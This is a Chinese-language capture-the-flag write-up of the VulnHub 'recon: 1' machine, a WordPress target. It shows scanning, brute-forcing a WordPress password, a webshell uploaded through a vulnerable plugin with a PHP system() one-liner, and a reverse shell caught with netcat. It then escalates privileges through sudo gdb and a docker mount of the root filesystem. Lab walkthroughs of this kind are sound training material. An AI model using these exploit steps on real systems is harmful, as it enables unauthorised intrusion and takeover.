Recon 1
作者:jason huawen
靶机信息
名称:recon: 1
地址:
https://www.vulnhub.com/entry/recon-1,438/
识别目标主机IP地址
─(kali㉿kali)-[~/Desktop/Vulnhub/ReconEE]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:f7:86:46 1 60 PCS Systemtechnik GmbH
192.168.56.220 08:00:27:23:fc:ec 1 60 PCS Systemtechnik GmbH
利用Kali Linux的netdiscover工具识别目标主机IP地址为192.168.56.220
NMAP扫描
┌──(kali㉿kali)-[~/Desktop/Vulnhub/ReconEE]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.220 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-16 21:52 EDT
Nmap scan report for localhost (192.168.56.220)
Host is up (0.00022s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 93:0b:57:ce:cb:d5:2b:c5:e6:48:dc:ed:89:6c:51:44 (RSA)
| 256 64:26:e5:bd:85:e9:f8:29:d9:bd:ed:2f:ca:a5:f7:0a (ECDSA)
|_ 256 5e:41:4c:19:e2:3c:c4:68:13:0c:5f:6f:f8:71:e6:1b (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-generator: WordPress 5.3.2
|_http-title: recon – Just another WordPress site
MAC Address: 08:00:27:23:FC:EC (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.67 seconds
NMAP扫描结果表明目标主机有2个开放端口:22(ssh)、80(http)
获得Shell
浏览器访问80端口,从返回页面内容可知目标主机运行wordpress站点
──(kali㉿kali)-[~/Desktop/Vulnhub/ReconEE]
└─$ curl http://192.168.56.220/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.18 (Ubuntu) Server at 192.168.56.220 Port 80</address>
</body></html>
┌──(kali㉿kali)-[~/Desktop/Vulnhub/ReconEE]
└─$ nikto -h http://192.168.56.220
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.220
+ Target Hostname: 192.168.56.220
+ Target Port: 80
+ Start Time: 2023-03-16 21:55:56 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with contents: <http://192.168.56.220/index.php/wp-json/>; rel="https://api.w.org/"
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header 'x-redirect-by' found, with contents: WordPress
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /: A Wordpress installation was found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ OSVDB-3268: /wp-content/uploads/: Directory indexing found.
+ /wp-content/uploads/: Wordpress uploads directory is browsable. This may reveal sensitive information
+ /wp-login.php: Wordpress login found
+ 7915 requests: 0 error(s) and 16 item(s) reported on remote host
+ End Time: 2023-03-16 21:57:07 (GMT-4) (71 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
┌──(kali㉿kali)-[~/Desktop/Vulnhub/ReconEE]
└─$ nikto -h http://192.168.56.220
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.220
+ Target Hostname: 192.168.56.220
+ Target Port: 80
+ Start Time: 2023-03-16 21:55:56 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with contents: <http://192.168.56.220/index.php/wp-json/>; rel="https://api.w.org/"
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header 'x-redirect-by' found, with contents: WordPress
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /: A Wordpress installation was found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ OSVDB-3268: /wp-content/uploads/: Directory indexing found.
+ /wp-content/uploads/: Wordpress uploads directory is browsable. This may reveal sensitive information
+ /wp-login.php: Wordpress login found
+ 7915 requests: 0 error(s) and 16 item(s) reported on remote host
+ End Time: 2023-03-16 21:57:07 (GMT-4) (71 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
┌──(kali㉿kali)-[~/Desktop/Vulnhub/ReconEE]
└─$ gobuster dir -u http://192.168.56.220 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.js,.sh
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.220
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.4
[+] Extensions: sh,php,html,txt,js
[+] Timeout: 10s
===============================================================
2023/03/16 21:57:43 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/index.php (Status: 301) [Size: 0] [--> http://192.168.56.220/]
/wp-content (Status: 301) [Size: 321] [--> http://192.168.56.220/wp-content/]
/wp-login.php (Status: 200) [Size: 4815]
/license.txt (Status: 200) [Size: 19935]
/wp-includes (Status: 301) [Size: 322] [--> http://192.168.56.220/wp-includes/]
/readme.html (Status: 200) [Size: 7368]
/wp-trackback.php (Status: 200) [Size: 135]
/wp-admin (Status: 301) [Size: 319] [--> http://192.168.56.220/wp-admin/]
/xmlrpc.php (Status: 405) [Size: 42]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/wp-signup.php (Status: 302) [Size: 0] [--> http://192.168.56.220/wp-login.php?action=register]
/server-status (Status: 403) [Size: 279]
Progress: 1322063 / 1323366 (99.90%)
===============================================================
2023/03/16 22:02:19 Finished
===============================================================
目录扫描没有得到更有价值的信息。
──(kali㉿kali)-[~/Desktop/Vulnhub/ReconEE]
└─$ wpscan --url http://192.168.56.220 -e u,p
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.56.220/ [192.168.56.220]
[+] Started: Thu Mar 16 22:02:46 2023
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.56.220/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.56.220/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.56.220/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.56.220/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.3.2 identified (Insecure, released on 2019-12-18).
| Found By: Rss Generator (Passive Detection)
| - http://192.168.56.220/index.php/feed/, <generator>https://wordpress.org/?v=5.3.2</generator>
| - http://192.168.56.220/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.3.2</generator>
[+] WordPress theme in use: twentytwenty
| Location: http://192.168.56.220/wp-content/themes/twentytwenty/
| Last Updated: 2022-11-02T00:00:00.000Z
| Readme: http://192.168.56.220/wp-content/themes/twentytwenty/readme.txt
| [!] The version is out of date, the latest version is 2.1
| Style URL: http://192.168.56.220/wp-content/themes/twentytwenty/style.css?ver=1.1
| Style Name: Twenty Twenty
| Style URI: https://wordpress.org/themes/twentytwenty/
| Description: Our default theme for 2020 is designed to take full advantage of the flexibility of the block editor...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.1 (80% confidence)
| Found By: Style (Passive Detection)
| - http://192.168.56.220/wp-content/themes/twentytwenty/style.css?ver=1.1, Match: 'Version: 1.1'
[+] Enumerating Most Popular Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <===============================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] recon
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Wp Json Api (Aggressive Detection)
| - http://192.168.56.220/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] reconauthor
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Thu Mar 16 22:02:55 2023
[+] Requests Done: 55
[+] Cached Requests: 6
[+] Data Sent: 13.911 KB
[+] Data Received: 405.11 KB
[+] Memory used: 240.016 MB
[+] Elapsed time: 00:00:08
(kali㉿kali)-[~/Desktop/Vulnhub/ReconEE]
└─$ wpscan --url http://192.168.56.220 -U recon -P /usr/share/wordlists/rockyou.txt
尝试破解密码失败(运行了16分钟)
┌──(kali㉿kali)-[~/Desktop/Vulnhub/ReconEE]
└─$ wpscan --url http://192.168.56.220 --plugins-detection mixed
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.56.220/ [192.168.56.220]
[+] Started: Thu Mar 16 22:22:31 2023
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.56.220/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.56.220/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.56.220/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.56.220/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.3.2 identified (Insecure, released on 2019-12-18).
| Found By: Rss Generator (Passive Detection)
| - http://192.168.56.220/index.php/feed/, <generator>https://wordpress.org/?v=5.3.2</generator>
| - http://192.168.56.220/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.3.2</generator>
[+] WordPress theme in use: twentytwenty
| Location: http://192.168.56.220/wp-content/themes/twentytwenty/
| Last Updated: 2022-11-02T00:00:00.000Z
| Readme: http://192.168.56.220/wp-content/themes/twentytwenty/readme.txt
| [!] The version is out of date, the latest version is 2.1
| Style URL: http://192.168.56.220/wp-content/themes/twentytwenty/style.css?ver=1.1
| Style Name: Twenty Twenty
| Style URI: https://wordpress.org/themes/twentytwenty/
| Description: Our default theme for 2020 is designed to take full advantage of the flexibility of the block editor...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.1 (80% confidence)
| Found By: Style (Passive Detection)
| - http://192.168.56.220/wp-content/themes/twentytwenty/style.css?ver=1.1, Match: 'Version: 1.1'
[+] Enumerating All Plugins (via Passive and Aggressive Methods)
Checking Known Locations - Time: 00:06:23 <=======================================> (101765 / 101765) 100.00% Time: 00:06:23
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] akismet
| Location: http://192.168.56.220/wp-content/plugins/akismet/
| Last Updated: 2022-12-01T17:18:00.000Z
| Readme: http://192.168.56.220/wp-content/plugins/akismet/readme.txt
| [!] The version is out of date, the latest version is 5.0.2
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.56.220/wp-content/plugins/akismet/, status: 200
|
| Version: 4.1.3 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.56.220/wp-content/plugins/akismet/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.56.220/wp-content/plugins/akismet/readme.txt
[+] insert-or-embed-articulate-content-into-wordpress
| Location: http://192.168.56.220/wp-content/plugins/insert-or-embed-articulate-content-into-wordpress/
| Last Updated: 2022-11-27T22:41:00.000Z
| Readme: http://192.168.56.220/wp-content/plugins/insert-or-embed-articulate-content-into-wordpress/readme.txt
| [!] The version is out of date, the latest version is 4.3000000017
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.56.220/wp-content/plugins/insert-or-embed-articulate-content-into-wordpress/, status: 200
|
| Version: 4.2995 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.56.220/wp-content/plugins/insert-or-embed-articulate-content-into-wordpress/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.56.220/wp-content/plugins/insert-or-embed-articulate-content-into-wordpress/readme.txt
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <==============================================> (137 / 137) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Thu Mar 16 22:29:30 2023
[+] Requests Done: 101943
[+] Cached Requests: 9
[+] Data Sent: 27.265 MB
[+] Data Received: 13.981 MB
[+] Memory used: 489.078 MB
[+] Elapsed time: 00:06:58
识别出插件insert-or-embed-articulate-content-into-wordpress,该插件有漏洞:
https://www.exploit-db.com/exploits/46981#:~:text=%23%20Exploit%20Title%3A%20Authenticated%20code%20execution%20in%20%60insert-or-embed-articulate-content-into-wordpress%60,PHP%205.6%20%23%20CVE%20%3A%20-%20%23%23%201.
但是这个漏洞是authenticated漏洞
还是需要首先破解密码
接下来尝试破解另一个用户的密码
─(kali㉿kali)-[~/Desktop/Vulnhub/ReconEE]
└─$ wpscan --url http://192.168.56.220 -U reconauthor -P /usr/share/wordlists/rockyou.txt
] Valid Combinations Found:
| Username: reconauthor, Password: football7
此时应该可以利用插件漏洞,步骤:
# 1. Create a .zip archive with 2 files: index.html, index.php
echo "<html>hello</html>" > index.html
echo "<?php echo system($_GET['cmd']); ?>" > index.php
zip poc.zip index.html index.php
## 2. Log in to wp-admin with any user role that has access to the plugin functionality (by default even `Contributors` role have access to it)
## 3. Create a new Post -> Select `Add block` -> E-Learning -> Upload the poc.zip -> Insert as: Iframe -> Insert (just like in tutorial https://youtu.be/knst26fEGCw?t=44 ;)
## 4. Access the webshell from the URL displayed after upload similar to
http://website.com/wp-admin/uploads/articulate_uploads/poc/index.php?cmd=whoami
参照上述步骤
──(kali㉿kali)-[~/Desktop/Vulnhub/ReconEE]
└─$ vim shell.php
┌──(kali㉿kali)-[~/Desktop/Vulnhub/ReconEE]
└─$ ls -alh
total 40K
drwxr-xr-x 2 kali kali 4.0K Mar 16 23:11 .
drwxr-xr-x 80 kali kali 4.0K Mar 16 21:51 ..
-rw-r--r-- 1 kali kali 1.6K Mar 16 22:41 dict
-rw-r--r-- 1 kali kali 12 Mar 16 22:54 index.html
-rw-r--r-- 1 root root 1.1K Mar 16 21:52 nmap_full_scan
-rwx------ 1 kali kali 5.4K Mar 16 23:11 shell.php
┌──(kali㉿kali)-[~/Desktop/Vulnhub/ReconEE]
└─$ zip jason_shell.zip index.html shell.php
adding: index.html (stored 0%)
adding: shell.php (deflated 59%)
/wp-content/uploads/articulate_uploads/jason_shell/index.html
访问:
http://192.168.56.220/wp-content/uploads/articulate_uploads/jason_shell/shell.php
在Kali Linux上成功得到了目标主机反弹回来的shell
┌──(kali㉿kali)-[~/Desktop/Vulnhub/ReconEE]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.146] from (UNKNOWN) [192.168.56.220] 45012
Linux hulk-buster 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
08:44:15 up 1:26, 0 users, load average: 0.00, 0.04, 0.45
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ is
/bin/sh: 1: is: not found
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@hulk-buster:/$ cd /home
cd /home
www-data@hulk-buster:/home$ ls -alh
ls -alh
total 16K
drwxr-xr-x 4 root root 4.0K Jan 28 2020 .
drwxr-xr-x 23 root root 4.0K Jan 28 2020 ..
drwxr-xr-x 3 hacker hacker 4.0K Jan 28 2020 hacker
drwxr-xr-x 2 offensivehack docker 4.0K Jan 28 2020 offensivehack
www-data@hulk-buster:/home$ cd hacker
cd hacker
www-data@hulk-buster:/home/hacker$ ls -alh
ls -alh
total 28K
drwxr-xr-x 3 hacker hacker 4.0K Jan 28 2020 .
drwxr-xr-x 4 root root 4.0K Jan 28 2020 ..
-rw------- 1 hacker hacker 8 Jan 28 2020 .bash_history
-rw-r--r-- 1 hacker hacker 220 Jan 28 2020 .bash_logout
-rw-r--r-- 1 hacker hacker 3.7K Jan 28 2020 .bashrc
drwx------ 2 hacker hacker 4.0K Jan 28 2020 .cache
-rw-r--r-- 1 hacker hacker 655 Jan 28 2020 .profile
www-data@hulk-buster:/home/hacker$ cd ..
cd ..
www-data@hulk-buster:/home$ cd offensivehack
cd offensivehack
www-data@hulk-buster:/home/offensivehack$ ls -alh
ls -alh
total 28K
drwxr-xr-x 2 offensivehack docker 4.0K Jan 28 2020 .
drwxr-xr-x 4 root root 4.0K Jan 28 2020 ..
-rw------- 1 offensivehack offensivehack 72 Jan 28 2020 .bash_history
-rw-r--r-- 1 offensivehack docker 220 Jan 28 2020 .bash_logout
-rw-r--r-- 1 offensivehack docker 3.7K Jan 28 2020 .bashrc
-rw-r--r-- 1 offensivehack docker 655 Jan 28 2020 .profile
-rw-r--r-- 1 root root 47 Jan 28 2020 user.txt
www-data@hulk-buster:/home/offensivehack$ cat user.txt
cat user.txt
oho!! not finished now.. find root flag.txt !!
www-data@hulk-buster:/home/offensivehack$
提权
www-data@hulk-buster:/home/offensivehack$ sudo -l
sudo -l
Matching Defaults entries for www-data on hulk-buster:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on hulk-buster:
(offensivehack) NOPASSWD: /usr/bin/gdb
www-data@hulk-buster:/home/offensivehack$ sudo -u offensivehack /usr/bin/gdb -nx -ex '!sh' -ex quit
<offensivehack$ sudo -u offensivehack /usr/bin/gdb -nx -ex '!sh' -ex quit
GNU gdb (Ubuntu 7.11.1-0ubuntu1~16.5) 7.11.1
Copyright (C) 2016 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word".
$ id
id
uid=1001(offensivehack) gid=119(docker) groups=119(docker)
切换到了offensivehack用户
$ id
id
uid=1001(offensivehack) gid=119(docker) groups=119(docker)
$ docker images
docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
ubuntu latest ccc6e87d482b 3 years ago 64.2MB
$ docker run -it -v /:/mnt ubuntu
docker run -it -v /:/mnt ubuntu
可以利用docker提权
root@d5bd00c86145:/mnt/root# cat flag.txt
cat flag.txt
_____ _ _ _ _ _ _
/ ____| | | | | | | | | | | | |
| | __ ___ ___ __| | | | ___ | |__ | | | | | |
| | |_ |/ _ \ / _ \ / _` | _ | |/ _ \| '_ \ | | | | | |
| |__| | (_) | (_) | (_| | | |__| | (_) | |_) | |_| |_| |_|
\_____|\___/ \___/ \__,_| \____/ \___/|_.__/ (_) (_) (_)
_ _ _ _ __ _ _ _ _ _ _ _____ _______ ______
| | | \ | | | | / _| | | | (_) | | | | (_) / ____|__ __| ____|
_ __ ___ | |_ | \| | ___ ___ | |__ __ _| |_| |_ ___ _ __ ___ ___ | |_ ___ _ __ __ _ | |_| |__ _ ___ | | | | | |__
| '_ \ / _ \| __| | . ` |/ _ \ / _ \| '_ \ / _` | _| __/ _ \ '__| / __|/ _ \| \ \ / / | '_ \ / _` | | __| '_ \| / __| | | | | | __|
| | | | (_) | |_ | |\ | (_) | (_) | |_) | | (_| | | | || __/ | \__ \ (_) | |\ V /| | | | | (_| | | |_| | | | \__ \ | |____ | | | |
|_| |_|\___/ \__| |_| \_|\___/ \___/|_.__/ \__,_|_| \__\___|_| |___/\___/|_| \_/ |_|_| |_|\__, | \__|_| |_|_|___/ \_____| |_| |_|
root@d5bd00c86145:/mnt/root#
经验教训
-
一般情况下wpscan只需要破解管理员账号的密码,但是在本靶机中破解管理员密码失败,此时应当可以考虑另外一个用户,而且考虑到有漏洞的插件是针对任何角色(any role)的用户都存在